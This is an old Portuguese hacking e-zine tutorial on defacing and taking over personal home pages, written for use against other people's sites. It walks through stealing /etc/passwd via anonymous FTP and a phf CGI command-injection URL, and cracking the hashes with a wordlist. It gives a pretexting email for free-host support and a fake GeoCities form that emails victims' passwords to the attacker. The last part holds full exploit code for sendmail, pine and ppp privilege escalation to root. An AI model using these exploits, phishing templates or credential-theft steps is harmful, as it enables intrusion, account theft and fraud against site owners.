<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>
3>#@<Mini manual de como hackear uma page>@#<3
HACKEANDO HOME PAGES
by
Dead*Pool
Antes de mais nada muita gente pediu para colocar mais coisas sobre
como obter passwords de pages etc...
Aqui vai um mini manual isto nao é nada de muita coisa tanto que
muita coisa aqui só funciona em sistemas antigos. Mas para quem
quer saber é melhor que nada. Aqui esta sendo repetido o metodo
anonymous FTP que esta na FW1 o resto é lucro.
1-INTRODUCAO :
O texto a seguir fala sobre como hackear uma home page.
Aqui estao as suas seçoes :
-Precauçoes-cuidados que você deve tomar.
-Sobre as senhas-arquivos falando sobre as senhas.
-Desencryptando as senhas-como desencryptar senhas.
-Ftp-como hackear uma HP por ftp.
-Phf-como hackear uma HP usando o método phf.
-Home page grátis-como hackear servidores de home page grátis.
-Home page grátis segundo método de como hackear servidores de
home pages grátis.
-Já cadastrado-Como hackear uma home page que você já tenha
cadastro no mesmo servidor.
-Telnet e exploits-Como hackear uma page usando telnet e exploits
-Já cadastrado segundo método de como hackear uma hp que você já
tenha cadastro no mesmo servidor.
2-PRECAUÇOES:
Nesse texto vou ensinar diversos métodos de como hackear uma home
page.
Toda vez que você entra em um sistema seu IP fica gravado e "eles"
vao poder te encontrar.
Portanto antes de cometer um ato como esse eu sugiro que vocês
tomem umas medidas de segurança como spoofing e etc...
3-SOBRE AS SENHAS :
A senha esta em um arquivo chamado passwd. Esse arquivo esta
normalmente em um diretório chamado etc/passwd.
Entao vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou
entao com shadow!
A diferença é que a senha encryptada é a própria senha só que esta
encryptada e a senha com shadow faz com que a senha fique escondida
em outro lugar! Ou seja, nao vai estar no passwd, vai estar em
outro diretório.
Para obter a senha escrita você vai ter que desencripta-la! As
senhas com shadow sao impossíveis de "desencryptar"!
(levando em conta que você nao tem unix).
Uma senha encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
Agora o exemplo de uma senha com shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Você pode notar que tem um "x" no root! Esse x pode ser
representado também por um "*".
Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as
senhas.
4-DESENCRYPTANDO :
Para desencryptar uma senha precisaremos de três arquivos básicos.
Uma word list, um desencryptador (recomendo o crackerjack/jack 14)
e logicamente o arquivo onde está senha(passwd).
O que é cada um?
Word list- Como o próprio nome já diz, é uma lista de palavras.
Desencryptador- é o programa que você vai usar para desencryptar a
senha.
Passwd- Nesse arquivo está a senha encryptada.
Coloque todos esses itens nesse mesmo diretório.
Abra o prompt do DOS e entre no diretório onde eles estao.
Agora faça o seguinte, digite :
"nome do programa desencryptador" "nome do arquivo onde esta a
senha" "nome da sua word list"
Entao vamos supor que meu programa é o jack, o arquivo é o passwd,
a word list á lista.
Entao ficaria assim :
jack passwd lista.txt
E pronto! A senha está desencryptada!
Mas como isso funciona??
Quando você roda o jack ele pega o arquivo passwd e testa com
todas as palavras da word list.
5-FTP
Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples
e rápido de ser feito.
Para fazer isso vamos usar o prompt do MS-DOS. Espero que você
saiba pelo menos mexer no básico do DOS. O que vamos faz é
simplesmente entrar no ftp da home page com login anonymous e
fazer o download do arquivo passwd.
Abra o prompt do DOS.
Você vai ter que entrar no ftp da HP que voce quer hackear.
Normalmente a endereþo é o mesmo da home page.
Entao digite ftp www.hackers.com
Ele vai pedir seu USER. Coloque anonymous.
Agora vai pedir que você coloque seu e-mail completo como senha.
Claro que você vai colocar alguma coisa qualquer, tipo
fuckyou@idiota.com.
Você vai entrar no ftp como user anonymous e retrictions applly!
Isso significa que você entrou como anonymous e com restriçoes
aplicadas!
Agora você precisa ir para o diretório etc.
Entre e faça o donwload do passwd.
Pra isso digite "get passwd".
Pronto, o arquivo passwd vai estar no diretório que você estava
quando entrou no ftp.
Tipo windows, arquivos de programas....
Agora você que tem o arquivo só precisa desencryptalo e pronto!
A senha estará em suas maos..
6-PHF :
O phf é com certeza o modo mais simples de se obter o arquivo
passwd. É tao simples que você nao precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar
uma URL.
Porém esse método tem 95% de chance de nao funcionar!
A maioria dos servidores já acharam o bug e concertaram.
Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Apenas isso e pronto!
7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):
Alguns servidores de home page tipo a geocities, tripod e a
angelfire, dao espaço para pessoas colocarem suas home pages no ar.
Há um modo bem simples de se obter a senha de home pages que estao
nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te
mandarem a senha da home page.
Mas nao mande um e-mail estúpido tipo : "por favor me mandem a
senha".
Façam algo mais convincente. Pegue todas as informaçoes da HP
possíveis. Do tipo :
"Mês passado eu me cadastrei no serviço de vocês e recebi uma
senha e um user name e meu endereço "endereço da HP do cara".
Eu coloquei algumas coisas no meu espaço e saí de férias.
Quando voltei das ferias eu tinha me esquecido da senha!!
Só me lembrava do user name, que é : "user name da HP".
Fiquei um bom tempo de ferias e nao pude pagar o provedor, por
isso estou com um e-mail diferente do que consta no cadastro de
vocês. O meu antigo e-mail era esse "mail do webmaster da HP"
Por favor preciso que vocês me mandem um e-mail para "seu e-mail".
Porque eu nao tenho o backup dos arquivos que coloquei lá e nao
gostaria de perde-los. Obrigado pela atençao. Espero que voces
mandem a senha o mais rápido que puderem."
Companhias como a geocities sao muito ocupadas pra ficar
verificando se é verdade eu nao!
Provavelmente eles iram acreditar e em 2 semanas(mais ou menos)
você receberá a senha no seu e-mail!
8-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2):
Outro modo de hackear esse tipo de home pages é enganar o próprio
webmaster da HP!
Esse modo funciona normalmente com webmasters idiotas que nao
sabem muito coisa e nem percebem que eles mesmos estao dando a
senha para o hackeador.
É outro método bem simples mas um pouco mais demorado. O que você
tem que fazer é criar uma pagina onde você finge que é a geocities
que esta dando mais megas para HP's!
Ou seja, você terá que criar uma página imitando a geocities! Faça
uma pagina exatamente no estilo da da geo. E coloque tudo com as
mesmas gifs, mesmos banners e coloque um formulário pra ser
preenchido e diga que quem preencher aquilo vai ganhas mais 10
megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o
endereço e etc....
Para o cara "receber" os megas ele terá que enviar o formulário.
Para isso ela deverá clicar em algum botao de envio, normalmente
um botao que fica escrito "submit" Quando a pessoa clica no botao
submit formulário é enviado para a geocities pois aquele botao tem
um comando para enviar para a geocities.Entao o que você terá que
fazer é mudar o comando. Em vez do formulário ser enviado para a
geocities esse formulário vai ser enviado para o seu e-mail.
Para isso você terá que editar a pagina da geocities. No lugar que
tem escrito:
<form action="/cgi-bin/homestead/file_manager" method=post></td>
Você tará que trocar para :
<FORM ACTION="http://www.uky.edu/cgi-bin/cgiwrap/~johnr/AnyForm.cgi"
METHOD="Post">
<INPUT TYPE="Hidden" Name="AnyFormMode" Value="mail">
<INPUT TYPE="Hidden" Name="AnyFormDisplay"
Value="http://www.geocities.com/members/tools/file_manager.html">
<INPUT TYPE="Hidden" Name="AnyFormTo" Value="Coloque seu e-mail aqui">
<INPUT TYPE="Hidden" Name="AnyFormSubject" Value="Senha hackeada da
geocities">
Entao assim que o cara clicar no botao submit todos os dados serao
enviados para o seu e-mail.
E assim você terá a senha.
Agora é só pegar um endereço na net e colocar essa pagina editada
na geocities nele e mandar as pessoas visitarem.
E pronto! O formulário vai chegar com a senha e user name no teu
e-mail.
Há uma tecnica parecida com essa mas É MUITO mais complicada.
Pra isso você vai precisar de um servidor pessoal e terá que mudar
algumas configuraçoes em:
TCP/IP
Para isso abra o painel de controle e entre no ícone redes.
Agora entre nas propriedades de TCP/IP.
Entre na conficuraçao DNS.
Selecione ativar DNS.
Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está
escrito com "l" e nao um "i")
Entao escreva no dominio-->COM.
Agora de OK em tudo. Vai pedir que você reinicie o micro. Pode
reiniciar.
Siga o mesmo procedimento do formulario e da pagina da geocities
da explicaçao anterior.
Salva essa pagina e coloque-a no diretório de paginas do seu
servidor.
Entao voce cria um diretório chamado "members", entra nesse
diretório e crie um, diretório chamado "tools". Coloque tudo da
page editada nesse diretório.
Coloque seu servidor pra funcionar e mande o cara entrar em :
HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html
O endereço tem que ser esse. Se a pessoa entrar no file manager da
geocities isso nao vai funcionar(ooohhh!!!)
Quando o cara colocar os dados dele lá e enviar estará tudo no teu
mail!
Queria avisar que esses metodos também funcionam com a angelfire e
com a tripod.
A geocities foi usada como exemplo.
9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR
Esse método é realmente difícil de funcionar mas as vezes funciona
com uns admins bem idiotas.(é o que nao falta por ai ;) )
Quando você entra no seu ftp você pode sair do seu diretório home
(diretorio onde você esta assim que entra) e voltar alguns
diretórios até encontrar o diretório da HP que você quer hackear.
Uma vez que voce já fez, se você puder ter acesso aos arquivos
HTML pegue-os e edite eles! E pronto!
Com admins mais inteligentes você nao consegue ter acesso os
arquivos da page alvo.
10-TELNET E EXPLOITS :
Exploits é talvez o melhor método de hackear uma home page.
Mas ele é um pouco mais complicado do que os outros métodos como
phf e ftp.
Antes de tudo você vai precisar de um programa de telnet.
Exploits expoem erros e bugs nos sistemas e normalmente te dao
root, sysop, admin....
Vou listar alguns exploits abaixo :(olhe a FW 02 onde existem estes
e muitos outros exploits ou veja a seçao exploits desta FW)
;-)
Esse se chama sendmail bug.
Ele cria um programa /tmp/x que chama shells como root.
-----------------------------Corta
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
-------------------------------------Corta
Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o
processo da tabela com ps você pode ver os usuário rodando o pine.
Um entao pode fazer um ls no /tmp/ pra conseguir o nome do lockfile
pra cada usuário. Vendo o processo da tabela de novo vai revelar
quais usuarios ou saem com mensagens nao lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link
de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o
pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contém. Agora precisa fazer um
" echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
---------------------------------------Corta
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
----------------------------------Corta
Esse é o último que vou relacionar aqui. Exploitation script para
vunerabilidade ppp. Funciona em "FreeBSD".
-------------------------Corta
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
----------------------------------Corta
Agora você tem o root. Faça o que você quiser! Mas eu trocaria
logo a senha da HP antes de mexer em qualquer coisa ou deletar.
<<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>><<FW>>